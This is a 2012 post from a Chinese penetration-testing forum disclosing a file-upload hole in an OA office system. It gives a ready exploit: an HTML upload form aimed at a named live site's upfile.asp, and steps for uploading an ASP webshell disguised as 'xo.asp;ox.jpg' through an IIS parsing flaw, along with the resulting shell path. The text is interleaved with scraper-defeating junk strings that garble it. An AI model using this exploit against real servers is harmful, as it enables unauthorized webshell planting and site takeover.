中国网络渗透测试联盟

标题: 全能OA办公系统0day OA办公系统漏洞 上传漏洞 [打印本页]

---

作者: admin    时间: 2012-11-21 13:45
标题: 全能OA办公系统0day OA办公系统漏洞 上传漏洞
全能OA办公系统 上传漏洞
​
8 \" p3 K8 }/ W! G* [% T7 |系统介绍：

) h, B2 {8 T! {7 w6 v% Z# Z全能OA办公系统2012是功能非常强大的OA系统，目前功能已完全能满足日常办公需要。

' J' S! H! j4 R主要功能：
3 @! e1 K# L0 a! t$ A. o7 t公司通告
工作计划
通讯助理
; x, c% [0 h' Y" q客户资源
我的公文
5 L6 d1 R* C2 j公文传阅
公共资源
! N+ }: R0 ]1 i* k9 G8 g资源预约
7 e3 k7 z6 T- z1 N/ |今日考勤
$ B2 i2 C3 H5 |5 J* x* w个人计划
个人通讯录
3 E, D( f' M' U3 ]5 ^) G个人基本档案
; r9 S3 B" g* t1 }未读邮件
发邮件
收件夹
7 i7 V. H7 [( T) w& o- _& L) N寄件夹
' n" A8 d: M" Z, b- z网络硬盘
! q" X0 u0 C3 N6 s网络会议
网络调查
交流论坛

5 H+ ]" `. r9 y7 B+ `有兴趣测试的朋友可以下源码看看
- S6 h" Z) I. @# w
源码下载：
: B% U- z8 S$ c8 C: }
! K. \4 H% I7 N  }% }: X! mhttp://www.mycodes.net/30/4750.htm
+ p& B" C8 M7 Y" K  z8 l0 q
漏洞介绍：

由upfile.asp上传文件漏洞引起

/ f0 v$ k: _- w9 B  L8 p" [/ Y测试方法：

) x0 N1 v% T" ?$ ~' g! D使用名小子上传http://www.itlynn.com/upfile.asp即可
' q1 H( {5 j6 M6 V; ~( P
- W" h0 r  f0 t' C# Q4 M如果upfile.asp文件被删除不存在。
: b, u+ x* T# g7 R. k% _. t
  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。

如果存在那么将如下代码保存为upfile.html。
2 k0 N& ?9 {. o% a- y- h( t
9 Q  N/ M, X. f然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。


0 K5 }" n8 W5 a* L* Y2 E
01 <table border='0' align="center" cellpadding="5">

/ B2 Y/ c3 I6 {: m9 O02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">

9 U( V4 [4 H. a# b6 ^/ e( ^  `03 <tr>
& e. H7 b2 m( g0 k) x! E$ B, u5 P& l8 K
4 R0 O. [! f* o" T% C* X" x7 y) ]9 a04             <td>报错：</td>

05             <td><input type='radio' name='errnumber' value='0'>

3 v8 {% `& ^$ d# l4 O* k06               自动更名

07               <input type='radio' name='errnumber' value='1' checked>

08               报错方式

09               <input type='radio' name='errnumber' value='2'>

10               直接覆盖</td>
  @0 s/ A5 \  z* _: l2 C
2 I  t7 O" e# n% t) f7 _7 R11           </tr>
3 I9 \/ D* X$ Z5 F) h
; ~! ?6 J. G, p' P9 I' [, x1 I9 Q12           <tr>

13             <td>主题：</td>

14             <td><input type='text' name='filename' size='30'></td>

15           </tr>
/ j. J! K1 i% m$ d
16           <tr>

" {3 j8 S3 U6 A/ }& }* J+ M17             <td>文件：</td>

" N" }+ i% I. i4 Y0 j4 ~% r7 r18             <td><input type="file"name="fruit"size="30"></td>

19           </tr>
8 E1 ]' E4 j/ t7 ]8 Z
9 U8 i0 O" c' c& J& I20           <tr>
% R4 b( P/ w. y+ X* i: V" M
7 U0 I0 E% n4 [$ j. e5 H21             <td valign='top'>简介：</td>

0 A& J" m% ?/ S8 T1 B22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>

23           </tr>

; ^: C. z2 p# s3 x) x8 R- |5 w24   
) \) f# ]" n1 h
25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>

26           </tr>

9 v! ?3 f7 j) A/ O3 J3 x0 t& \0 M+ Y: T- r27         </form>

然后打开上传一个文件名为xo.asp;ox.jpg的文件。
% r' |- k9 ~8 ^5 l; z  O


  F& r' C7 C) c' j" _" V上传成功后，马的路径是：http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
* R; y" y& U( n& }) _! D
, B: H# y! C* I此漏洞需要配合解析漏洞利用。
/ p2 ~; _# R6 A4 s  z) p/ G% U
6 L3 ]4 U: p$ Z' A* U3 |

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2